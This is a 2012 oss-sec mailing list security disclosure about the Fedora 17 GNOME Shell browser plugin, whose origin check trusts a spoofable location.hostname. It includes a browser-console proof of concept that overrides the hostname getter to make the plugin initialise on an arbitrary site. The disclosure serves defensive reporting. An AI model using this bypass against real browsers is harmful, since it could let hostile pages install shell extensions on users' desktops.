oss-sec mailing list archives
note on gnome shell extensions
From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sun, 9 Sep 2012 00:36:26 +0200
List, I just installed Fedora 17 on a workstation. While researching how to upgrade gnome 3 to version 2, I noticed it installed a browser extension called "Gnome Shell Integration". $ rpm -qf /usr/lib64/mozilla/plugins/libgnome-shell-browser-plugin.so gnome-shell-3.4.1-5.fc17.x86_64 The NPPVpluginDescriptionString states "It can be used only by extensions.gnome.org", but I happen to know that is a tricky thing to get right. 102 if (!funcs.getproperty (instance, NPVARIANT_TO_OBJECT (document), 103 funcs.getstringidentifier ("location"), 104 &location)) 105 goto out; 106 107 if (!NPVARIANT_IS_OBJECT (location)) 108 goto out; 109 110 hostname = get_string_property (instance, 111 NPVARIANT_TO_OBJECT (location), 112 "hostname"); 113 114 if (g_strcmp0 (hostname, ORIGIN)) 115 { 116 g_debug ("origin does not match, is %s", 117 hostname); 118 119 goto out; 120 } I'm familiar with this topic as I wrote a tool for managing broken but necessary plugins by restricting them to trusted domains. http://code.google.com/p/nssecurity As far as I know, browsers only attempt to prevent tampering with document.location.href, anything else can be modified. For example, this works in Chrome, I don't know the syntax for Mozilla:
location.__defineGetter__("hostname", function () { return "arbitrary"; })
undefined
location.hostname
"arbitrary" However,
location.__defineGetter__("href", function () { return "arbitrary"; })
undefined
location.href
"http://realurl.test/asdasd" So this should fail:
o = document.createElement('OBJECT')
<object>?</object>?
o.setAttribute('TYPE', 'application/x-gnome-shell-integration')
undefined
document.body.appendChild(o)
<object type=?"application/?x-gnome-shell-integration">?</object>?
o.shellVersion
undefined But we can re-insert it and make it work:
document.body.removeChild(o)
<object type=?"application/?x-gnome-shell-integration">?</object>?
location.__defineGetter__("hostname", function () { return
"extensions.gnome.org"; }) undefined
document.body.appendChild(o)
<object type=?"application/?x-gnome-shell-integration">?</object>?
o.shellVersion
"3.4.1"
document.location.href
"https://www.redhat.com/" The plugin incorrectly trusted hostname, and initialized. As far as I can tell, the plugin will let you install new shell extensions, I don't know what the impact of that is, can they contain native code? Tavis. -- ------------------------------------- taviso () cmpxchg8b com | pgp encrypted mail preferred -------------------------------------------------------
Current thread:
- note on gnome shell extensions Tavis Ormandy (Sep 08)
- Re: note on gnome shell extensions Kurt Seifried (Sep 08)
- Re: note on gnome shell extensions Vincent Danen (Sep 10)
- Re: note on gnome shell extensions Tavis Ormandy (Sep 13)
- Re: note on gnome shell extensions Marcus Meissner (Sep 13)
- Re: note on gnome shell extensions Vincent Danen (Sep 13)
- Re: note on gnome shell extensions Tavis Ormandy (Sep 13)
- Re: Re: note on gnome shell extensions Vincent Danen (Sep 13)
- Re: Re: note on gnome shell extensions Kurt Seifried (Sep 13)
- Re: Re: note on gnome shell extensions Vincent Danen (Sep 17)
- Re: Re: note on gnome shell extensions Sebastian Krahmer (Sep 17)
- Re: note on gnome shell extensions Vincent Danen (Sep 10)
- Re: note on gnome shell extensions Kurt Seifried (Sep 08)